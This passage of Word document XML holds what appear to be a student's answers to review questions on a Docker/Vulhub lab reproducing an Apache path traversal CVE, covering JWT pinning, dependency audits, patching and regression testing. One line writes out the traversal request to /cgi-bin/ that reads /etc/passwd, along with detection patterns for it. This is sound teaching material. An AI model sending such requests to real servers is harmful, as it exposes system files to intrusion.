          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, not encrypted — anyone can read it, so it must never carry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>secrets. This project pins the algorithm server-side, because accepting the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>alg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the token enables the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and algorithm-confusion forgeries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Risks of not auditing dependencies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A vulnerable transitive library is exploitable without a single line of your own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">code changing — Log4Shell and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>event-stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the canonical cases. You also</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>inherit abandoned packages, typosquatted names, and licence obligations. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>practical risk is that your own code review says "clean" while the shipped</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">artifact is vulnerable; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pip-audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in CI turns that into a build failure instead</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>of an incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Advantages of Docker + Vulhub over installing vulnerable software locally?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Isolation: the vulnerable service runs in a container with no access to the host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>filesystem or network beyond the published port, so a mistake does not compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>the machine. Reproducibility: the exact vulnerable version is pinned, so results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>match the CVE write-up and are repeatable by a grader. Disposability: `docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>compose down` returns to a clean state, which makes it safe to run real exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Speed: no dependency conflicts between the vulnerable stack and the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. Vulnerability vs exploit — what was reproduced?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A vulnerability is the weakness itself (the ordering bug in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ap_normalize_path()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>); an exploit is the concrete input that weaponises it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>GET /cgi-bin/.%2e/…/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>). I reproduced the exploit to demonstrate the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vulnerability, and the fix addressed the vulnerability, not the payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7. Why is regression testing critical after a patch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security patches are frequently applied under time pressure to code paths that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>also serve normal traffic. A fix that blocks the payload by breaking path handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>can break legitimate requests — for example an over-eager normalisation that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>rejects encoded characters in filenames. Without a functional check after the fix,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>you can ship a "secure" service that no longer works, and the next rollback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>reintroduces the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>8. How does reproducing CVEs help a security specialist?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>It converts advisory text into intuition about exploitability: you learn what</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>preconditions matter (here: an aliased path, the permissive default, and CGI),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>which is exactly what you need to prioritise patching across an estate. For a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pentester it supplies tested payloads and an understanding of variants; for a SOC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>analyst it supplies the request patterns to detect (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>%2e%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in URI, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/cgi-bin/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>traversal) and the reason a 404 versus 500 matters. It also calibrates trust in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>scanners: knowing the mechanics tells you why a scanner missed or mislabelled a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>finding.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:pgSz w:w="11906" w:h="16838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7"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
      </w:rPr>
      <w:t xml:space="preserve">— </w:t>
    </w:r>
    <w:r/>
    <w:fldSimple w:instr="PAGE"/>
    <w:r>
      <w:rPr>
        <w:color w:val="595959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2E549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